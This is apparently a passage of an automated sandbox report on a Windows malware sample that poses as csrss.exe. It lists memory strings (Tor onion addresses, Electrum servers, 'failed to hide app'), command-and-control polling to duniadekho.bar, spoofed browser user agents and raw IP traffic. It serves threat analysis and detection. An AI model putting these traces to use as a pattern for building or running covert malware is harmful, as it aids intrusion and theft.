%wframe_data_pad_too_bigfreeIndex is not validgenerate challenge: %wgetenv before env initgzip: invalid checksumheadTailIndex overflowheader field %q = %q%shpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://localhost:3433/https://duniadekho.baridna: invalid label %qinappropriate fallbackinteger divide by zerointegrity check failedinterface conversion: internal inconsistencyinvalid Trailer key %qinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressmultiple :: in addressndndword5lpb7eex.onionnetwork is unreachableno connection providednon-Go function at pc=oldoverflow is not niloperation was canceledoverflowing coordinateozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionread response body: %wreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningset Tor mode to %s: %wskipping Question Nameskipping Question Typespan has no free spacesql: no Rows availablestack not a power of 2status/bootstrap-phasetrace reader (blocked)trace: alloc too largetransaction is stoppedtransaction not existsunexpected length codeunexpected method stepwirep: invalid p statewrite on closed bufferx509: malformed issuerzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
Source: csrss.exe, 0000001F.00000003.208814614113.0000000003D00000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: Nyiakeng_Puachue_HmongPakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlDeleteFunctionTableRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSao Tome Standard TimeSeImpersonatePrivilegeSetupDiEnumDriverInfoWSetupDiGetClassDevsExWTasmania Standard TimeTor bootstrap progressTor service is runningUnsupported Media TypeWSAGetOverlappedResultWSALookupServiceBeginWWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8access-control-max-ageaddress already in useadvapi32.dll not foundargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryclient not initializedcompileCallabck: type couldn't create devicecouldn't get file infocouldn't start servicecoulnd't write to filecreate main window: %wdecode and decrypt: %wdriver: bad connectionduplicated defer entryelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionencrypt and encode: %werror decoding messageerror parsing regexp: failed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to register: %wfailed to set UUID: %wframe_data_pad_too_bigfreeIndex is not validgenerate challenge: %wgetenv before env initgzip: invalid checksumheadTailIndex overflowheader field %q = %q%shpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://localhost:3433/https://duniadekho.baridna: invalid label %qinappropriate fallbackinteger divide by zerointegrity check failedinterface conversion: internal inconsistencyinvalid Trailer key %qinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressmultiple :: in addressndndword5lpb7eex.onionnetwork is unreachableno connection providednon-Go function at pc=oldoverflow is not niloperation was canceledoverflowing coordinateozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionread response body: %wreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningset Tor mode to %s: %wskipping Question Nameskipping Question Typespan has no free spacesql: no Rows availablestack not a power of 2status/bootstrap-phasetrace reader (blocked)trace: alloc too largetransaction is stoppedtransaction not existsunexpected length codeunexpected method stepwirep: invalid p statewrite on closed bufferx509: malformed issuerzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
Source: csrss.exe, 00000028.00000003.208837272188.0000000003D00000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: Nyiakeng_Puachue_HmongPakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlDeleteFunctionTableRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSao Tome Standard TimeSeImpersonatePrivilegeSetupDiEnumDriverInfoWSetupDiGetClassDevsExWTasmania Standard TimeTor bootstrap progressTor service is runningUnsupported Media TypeWSAGetOverlappedResultWSALookupServiceBeginWWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8access-control-max-ageaddress already in useadvapi32.dll not foundargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryclient not initializedcompileCallabck: type couldn't create devicecouldn't get file infocouldn't start servicecoulnd't write to filecreate main window: %wdecode and decrypt: %wdriver: bad connectionduplicated defer entryelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionencrypt and encode: %werror decoding messageerror parsing regexp: failed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to register: %wfailed to set UUID: %wframe_data_pad_too_bigfreeIndex is not validgenerate challenge: %wgetenv before env initgzip: invalid checksumheadTailIndex overflowheader field %q = %q%shpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://localhost:3433/https://duniadekho.baridna: invalid label %qinappropriate fallbackinteger divide by zerointegrity check failedinterface conversion: internal inconsistencyinvalid Trailer key %qinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressmultiple :: in addressndndword5lpb7eex.onionnetwork is unreachableno connection providednon-Go function at pc=oldoverflow is not niloperation was canceledoverflowing coordinateozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionread response body: %wreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningset Tor mode to %s: %wskipping Question Nameskipping Question Typespan has no free spacesql: no Rows availablestack not a power of 2status/bootstrap-phasetrace reader (blocked)trace: alloc too largetransaction is stoppedtransaction not existsunexpected length codeunexpected method stepwirep: invalid p statewrite on closed bufferx509: malformed issuerzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
Source: csrss.exe, 0000002B.00000003.208864091925.0000000003D00000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: Nyiakeng_Puachue_HmongPakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlDeleteFunctionTableRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSao Tome Standard TimeSeImpersonatePrivilegeSetupDiEnumDriverInfoWSetupDiGetClassDevsExWTasmania Standard TimeTor bootstrap progressTor service is runningUnsupported Media TypeWSAGetOverlappedResultWSALookupServiceBeginWWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8access-control-max-ageaddress already in useadvapi32.dll not foundargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryclient not initializedcompileCallabck: type couldn't create devicecouldn't get file infocouldn't start servicecoulnd't write to filecreate main window: %wdecode and decrypt: %wdriver: bad connectionduplicated defer entryelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionencrypt and encode: %werror decoding messageerror parsing regexp: failed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to register: %wfailed to set UUID: %wframe_data_pad_too_bigfreeIndex is not validgenerate challenge: %wgetenv before env initgzip: invalid checksumheadTailIndex overflowheader field %q = %q%shpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://localhost:3433/https://duniadekho.baridna: invalid label %qinappropriate fallbackinteger divide by zerointegrity check failedinterface conversion: internal inconsistencyinvalid Trailer key %qinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressmultiple :: in addressndndword5lpb7eex.onionnetwork is unreachableno connection providednon-Go function at pc=oldoverflow is not niloperation was canceledoverflowing coordinateozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionread response body: %wreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningset Tor mode to %s: %wskipping Question Nameskipping Question Typespan has no free spacesql: no Rows availablestack not a power of 2status/bootstrap-phasetrace reader (blocked)trace: alloc too largetransaction is stoppedtransaction not existsunexpected length codeunexpected method stepwirep: invalid p statewrite on closed bufferx509: malformed issuerzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
Source: csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: Nyiakeng_Puachue_HmongPakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlDeleteFunctionTableRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSao Tome Standard TimeSeImpersonatePrivilegeSetupDiEnumDriverInfoWSetupDiGetClassDevsExWTasmania Standard TimeTor bootstrap progressTor service is runningUnsupported Media TypeWSAGetOverlappedResultWSALookupServiceBeginWWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8access-control-max-ageaddress already in useadvapi32.dll not foundargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryclient not initializedcompileCallabck: type couldn't create devicecouldn't get file infocouldn't start servicecoulnd't write to filecreate main window: %wdecode and decrypt: %wdriver: bad connectionduplicated defer entryelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionencrypt and encode: %werror decoding messageerror parsing regexp: failed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to register: %wfailed to set UUID: %wframe_data_pad_too_bigfreeIndex is not validgenerate challenge: %wgetenv before env initgzip: invalid checksumheadTailIndex overflowheader field %q = %q%shpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://localhost:3433/https://duniadekho.baridna: invalid label %qinappropriate fallbackinteger divide by zerointegrity check failedinterface conversion: internal inconsistencyinvalid Trailer key %qinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressmultiple :: in addressndndword5lpb7eex.onionnetwork is unreachableno connection providednon-Go function at pc=oldoverflow is not niloperation was canceledoverflowing coordinateozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionread response body: %wreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningset Tor mode to %s: %wskipping Question Nameskipping Question Typespan has no free spacesql: no Rows availablestack not a power of 2status/bootstrap-phasetrace reader (blocked)trace: alloc too largetransaction is stoppedtransaction not existsunexpected length codeunexpected method stepwirep: invalid p statewrite on closed bufferx509: malformed issuerzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
Uses STUN server to do NAT traversial
Source: unknown DNS query: name: stun.stunprotocol.org
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /api/poll HTTP/1.1Host: server5.duniadekho.barUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Safari/605.1.15Content-Length: 752Version: 195Accept-Encoding: gzip
Source: global traffic HTTP traffic detected: POST /api/poll HTTP/1.1Host: server5.duniadekho.barUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.102 Safari/537.36Content-Length: 752Version: 195Accept-Encoding: gzip
Source: global traffic HTTP traffic detected: POST /v4/register_subscriber HTTP/1.1Host: api.sec-tunnel.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.192 Safari/537.36 OPR/74.0.3911.232Content-Length: 122Accept: application/jsonContent-Type: application/x-www-form-urlencodedSE-Client-Version: Stable 74.0.3911.232SE-Operating-System: WindowsAccept-Encoding: gzip
Source: global traffic HTTP traffic detected: POST /v4/register_subscriber HTTP/1.1Host: api.sec-tunnel.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.192 Safari/537.36 OPR/74.0.3911.232Content-Length: 122Accept: application/jsonAuthorization: Digest username="se0316", realm="ApiDigest", nonce="/4Ky2S+EQNGLy90l", uri="/v4/register_subscriber", response="c831806b14e2c3b7004579ec11587612cdb1b3917335891cf7235198c99dc729", algorithm=SHA-256, cnonce="000275160ea60cbdba91b4cc7df429a08789804f2c6a668bf7f545196daed8cb", opaque="KPVLh09NoSzfihFl", qop=auth, nc=00000002Content-Type: application/x-www-form-urlencodedSE-Client-Version: Stable 74.0.3911.232SE-Operating-System: WindowsAccept-Encoding: gzip
Source: global traffic HTTP traffic detected: POST /v4/register_device HTTP/1.1Host: api.sec-tunnel.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.192 Safari/537.36 OPR/74.0.3911.232Content-Length: 104Accept: application/jsonAuthorization: Digest username="se0316", realm="ApiDigest", nonce="/4Ky2S+EQNGLy90l", uri="/v4/register_device", response="e52728886ab90acd4e20176061d98c9597dfc0e29f7caa7fe9f79f26f8a6905e", algorithm=SHA-256, cnonce="096351fa04f952336d066a61ea276680eb33abaa2d9cd34e42ccb75380bbebe6", opaque="KPVLh09NoSzfihFl", qop=auth, nc=00000003Content-Type: application/x-www-form-urlencodedCookie: session=MTY4NTI2NjQ1OHxOd3dBTkVOWVZETk1WMUpQUjBkWFVsQTNRelkyVWtoWVRUTlJUMUJYTjBwT1JGUlNSMDgyV2pSU1JVZFlNMFZITWs1S1NEWkhWVkU9fO17cEDOazaCKbxTQueC_XgaY796TAY41P_GtC_vwNFlSE-Client-Version: Stable 74.0.3911.232SE-Operating-System: WindowsAccept-Encoding: gzip
Source: global traffic HTTP traffic detected: POST /v4/discover HTTP/1.1Host: api.sec-tunnel.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.192 Safari/537.36 OPR/74.0.3911.232Content-Length: 79Accept: application/jsonAuthorization: Digest username="se0316", realm="ApiDigest", nonce="/4Ky2S+EQNGLy90l", uri="/v4/discover", response="6646ff41f2e352bbf338a01d45b12aa3ad1ca7b27dd967c0cec8bb32f4d3882a", algorithm=SHA-256, cnonce="1aac6b7a1b1d1ba6d73b41ee4a40e57426e70bce1ac85d74449c90bceeb0c432", opaque="KPVLh09NoSzfihFl", qop=auth, nc=00000004Content-Type: application/x-www-form-urlencodedCookie: session=MTY4NTI2NjQ1OHxOd3dBTkVOWVZETk1WMUpQUjBkWFVsQTNRelkyVWtoWVRUTlJUMUJYTjBwT1JGUlNSMDgyV2pSU1JVZFlNMFZITWs1S1NEWkhWVkU9fO17cEDOazaCKbxTQueC_XgaY796TAY41P_GtC_vwNFlSE-Client-Version: Stable 74.0.3911.232SE-Operating-System: WindowsAccept-Encoding: gzip
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.11.20:49996 -> 62.210.99.238:39819
Source: global traffic TCP traffic: 192.168.11.20:49999 -> 77.68.94.106:9001
Source: global traffic UDP traffic: 192.168.11.20:64952 -> 74.125.204.127:19302
Source: unknown Network traffic detected: HTTP traffic on port 49997 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50013 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50038 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50009 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50011 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50042 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50007 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50015 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50010
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50011
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50013
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50038
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50015
Source: unknown Network traffic detected: HTTP traffic on port 50001 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49990 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50005 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49992 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50043 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50045 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49998
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49997
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50007
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50006
Source: unknown Network traffic detected: HTTP traffic on port 49998 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50009
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50008
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49993
Source: unknown Network traffic detected: HTTP traffic on port 50010 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49992
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49991
Source: unknown Network traffic detected: HTTP traffic on port 50008 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49990
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50043
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50042
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50001
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50045
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50000
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50044
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50002
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50005
Source: unknown Network traffic detected: HTTP traffic on port 50002 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50000 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50006 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49991 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50044 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49993 -> 443
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Sun, 28 May 2023 09:32:16 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Powered-By: PHP/8.0.25Access-Control-Allow-Credentials: false
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Sun, 28 May 2023 09:33:14 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Powered-By: PHP/8.0.25Set-Cookie: PHPSESSID=9afcop0lb77374j5hf7sfs0fck; path=/; HttpOnlyExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheAccess-Control-Allow-Credentials: false
Source: unknown TCP traffic detected without corresponding DNS query: 51.159.136.111
Source: unknown TCP traffic detected without corresponding DNS query: 51.159.136.111
Source: unknown TCP traffic detected without corresponding DNS query: 51.159.136.111
Source: unknown TCP traffic detected without corresponding DNS query: 51.159.136.111
Source: unknown TCP traffic detected without corresponding DNS query: 51.159.136.111
Source: unknown TCP traffic detected without corresponding DNS query: 77.68.94.106
Source: unknown TCP traffic detected without corresponding DNS query: 147.135.65.26
Source: unknown TCP traffic detected without corresponding DNS query: 158.69.205.247
Source: unknown TCP traffic detected without corresponding DNS query: 147.135.65.26
Source: unknown TCP traffic detected without corresponding DNS query: 158.69.205.247
Source: unknown TCP traffic detected without corresponding DNS query: 51.159.136.111
Source: unknown TCP traffic detected without corresponding DNS query: 147.135.65.26
Source: unknown TCP traffic detected without corresponding DNS query: 51.159.136.111
Source: unknown TCP traffic detected without corresponding DNS query: 158.69.205.247
Source: unknown TCP traffic detected without corresponding DNS query: 77.68.94.106
Source: unknown TCP traffic detected without corresponding DNS query: 77.68.94.106
Source: unknown TCP traffic detected without corresponding DNS query: 51.159.136.111
Source: unknown TCP traffic detected without corresponding DNS query: 77.68.94.106
Source: unknown TCP traffic detected without corresponding DNS query: 77.68.94.106
Source: unknown TCP traffic detected without corresponding DNS query: 51.159.136.111
Source: unknown TCP traffic detected without corresponding DNS query: 77.68.94.106
Source: unknown TCP traffic detected without corresponding DNS query: 77.68.94.106
Source: unknown TCP traffic detected without corresponding DNS query: 77.68.94.106
Source: unknown TCP traffic detected without corresponding DNS query: 77.68.94.106
Source: unknown TCP traffic detected without corresponding DNS query: 77.68.94.106
Source: unknown TCP traffic detected without corresponding DNS query: 77.68.94.106
Source: unknown TCP traffic detected without corresponding DNS query: 77.68.94.106
Source: unknown TCP traffic detected without corresponding DNS query: 77.68.94.106
Source: unknown TCP traffic detected without corresponding DNS query: 77.68.94.106
Source: unknown TCP traffic detected without corresponding DNS query: 77.68.94.106
Source: unknown TCP traffic detected without corresponding DNS query: 77.68.94.106
Source: unknown TCP traffic detected without corresponding DNS query: 77.68.94.106
Source: unknown TCP traffic detected without corresponding DNS query: 77.68.94.106
Source: unknown TCP traffic detected without corresponding DNS query: 77.68.94.106
Source: unknown TCP traffic detected without corresponding DNS query: 77.68.94.106
Source: unknown TCP traffic detected without corresponding DNS query: 77.68.94.106
Source: unknown TCP traffic detected without corresponding DNS query: 77.68.94.106
Source: unknown TCP traffic detected without corresponding DNS query: 77.68.94.106
Source: unknown TCP traffic detected without corresponding DNS query: 77.68.94.106
Source: unknown TCP traffic detected without corresponding DNS query: 77.68.94.106
Source: unknown TCP traffic detected without corresponding DNS query: 77.68.94.106
Source: unknown TCP traffic detected without corresponding DNS query: 77.68.94.106
Source: unknown TCP traffic detected without corresponding DNS query: 77.68.94.106
Source: unknown TCP traffic detected without corresponding DNS query: 77.68.94.106
Source: unknown TCP traffic detected without corresponding DNS query: 77.68.94.106
Source: unknown TCP traffic detected without corresponding DNS query: 77.68.94.106
Source: unknown TCP traffic detected without corresponding DNS query: 77.68.94.106
Source: unknown TCP traffic detected without corresponding DNS query: 77.68.94.106
Source: unknown TCP traffic detected without corresponding DNS query: 77.68.94.106
Source: unknown TCP traffic detected without corresponding DNS query: 77.68.94.106
Source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
Source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/Root.crl0
Source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/primobject.crl0
Source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://devlog.gregarius.net/docs/ua)Links
Source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://https://_bad_pdb_file.pdb
Source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://invalidlog.txtlookup
Source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://localhost:3433/https://duniadekho.baridna:
Source: powershell.exe, 00000035.00000002.209188988689.00000000709CD000.00000020.00000001.01000000.00000010.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000035.00000002.209188988689.00000000709CD000.00000020.00000001.01000000.00000010.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
